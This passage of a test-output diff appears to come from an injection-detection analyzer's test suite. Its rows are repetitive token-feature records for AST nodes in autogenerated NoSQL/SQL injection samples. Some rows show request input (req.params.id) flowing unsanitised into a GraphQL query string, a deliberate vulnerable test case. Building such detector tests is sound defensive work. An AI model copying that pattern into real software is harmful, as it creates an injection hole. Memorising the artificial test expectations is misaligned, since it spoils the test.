contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:25 | req.params | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:25 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:25 | req.params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:28 | req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:28 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:28 | req.params.id | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:28 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:16:119:28 | req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:20:119:25 | params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:20:119:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:20:119:25 | params | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:20:119:25 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:20:119:25 | params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:27:119:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:27:119:28 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:27:119:28 | id | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:27:119:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:119:27:119:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:16 | result | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:16 | result | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:16 | result | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:16 | result | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:16 | result | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:49 | result ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:49 | result ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:49 | result ... ${id}`) | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:49 | result ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:11:120:49 | result ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:20:120:49 | await k ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:20:120:49 | await k ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:20:120:49 | await k ... ${id}`) | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:20:120:49 | await k ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:20:120:49 | await k ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:28 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:28 | kit | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:28 | kit | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:28 | kit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:28 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:36 | kit.graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:36 | kit.graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:36 | kit.graphql | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:36 | kit.graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:36 | kit.graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | exceptional return of kit.gra ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | exceptional return of kit.gra ... ${id}`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | exceptional return of kit.gra ... ${id}`) | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | exceptional return of kit.gra ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | exceptional return of kit.gra ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | kit.gra ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | kit.gra ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | kit.gra ... ${id}`) | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | kit.gra ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:26:120:49 | kit.gra ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:30:120:36 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:30:120:36 | graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:30:120:36 | graphql | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:30:120:36 | graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:30:120:36 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:38:120:48 | `foo ${id}` | CalleeFlexibleAccessPath | kit.graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:38:120:48 | `foo ${id}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:38:120:48 | `foo ${id}` | calleeImports | @actions/github | @@ -626,6 +3372,241 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:38:120:48 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:38:120:48 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:38:120:48 | `foo ${id}` | receiverName | kit | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:39:120:42 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:39:120:42 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:39:120:42 | foo | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:39:120:42 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:39:120:42 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:39:120:42 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:45:120:46 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:45:120:46 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:45:120:46 | id | enclosingFunctionBody | req res kit github getOctokit foo id req params id result kit graphql foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:45:120:46 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:45:120:46 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:120:45:120:46 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:0 | this | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:0 | this | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | checkSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | checkSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | checkSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | joiSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | joiSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | schema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | schema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:1 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:22 | import ... 'ajv'; | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:22 | import ... 'ajv'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:1:1:22 | import ... 'ajv'; | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:8:1:10 | Ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:17:1:21 | 'ajv' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:17:1:21 | 'ajv' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:1:17:1:21 | 'ajv' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:1:2:30 | import ... press'; | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:1:2:30 | import ... press'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:1:2:30 | import ... press'; | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:8:2:14 | express | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:21:2:29 | 'express' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:21:2:29 | 'express' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:2:21:2:29 | 'express' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:1:3:38 | import ... ngodb'; | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:1:3:38 | import ... ngodb'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:1:3:38 | import ... ngodb'; | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:10:3:20 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:29:3:37 | 'mongodb' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:29:3:37 | 'mongodb' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:3:29:3:37 | 'mongodb' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:9 | app | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:9 | app | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:21 | app | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:21 | app | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:21 | app = express() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:7:5:21 | app = express() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:19 | express | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:19 | express | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:21 | exceptional return of express() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:21 | exceptional return of express() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:21 | express() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:5:13:5:21 | express() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:7:12 | schema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:7:12 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:7:12 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:7:12 | schema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:13:1 | schema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:13:1 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:13:1 | schema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:13:1 | schema ... },\\n} | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:13:1 | schema ... },\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:7:13:1 | schema ... },\\n} | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:16:13:1 | {\\n t ... },\\n} | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:16:13:1 | {\\n t ... },\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:7:16:13:1 | {\\n t ... },\\n} | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:8 | type | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:8 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:8 | type | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:18 | type: 'object' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:18 | type: 'object' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:18 | type: 'object' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:18 | type: 'object' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:18 | type: 'object' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:5:8:18 | type: 'object' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:11:8:18 | 'object' | assignedToPropName | type | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:11:8:18 | 'object' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:11:8:18 | 'object' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:8:11:8:18 | 'object' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:9:14 | properties | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:9:14 | properties | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:9:14 | properties | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:12:5 | propert ... ,\\n } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:12:5 | propert ... ,\\n } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:12:5 | propert ... ,\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:12:5 | propert ... ,\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:12:5 | propert ... ,\\n } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:5:12:5 | propert ... ,\\n } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:17:12:5 | {\\n ... ,\\n } | assignedToPropName | properties | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:17:12:5 | {\\n ... ,\\n } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:17:12:5 | {\\n ... ,\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:9:17:12:5 | {\\n ... ,\\n } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:12 | date | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:12 | date | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:12 | date | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:32 | date: { ... ring' } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:32 | date: { ... ring' } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:32 | date: { ... ring' } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:32 | date: { ... ring' } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:32 | date: { ... ring' } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:9:10:32 | date: { ... ring' } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:15:10:32 | { type: 'string' } | assignedToPropName | date | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:15:10:32 | { type: 'string' } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:15:10:32 | { type: 'string' } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:15:10:32 | { type: 'string' } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:20 | type | contextFunctionInterfaces | validate(x) | +| 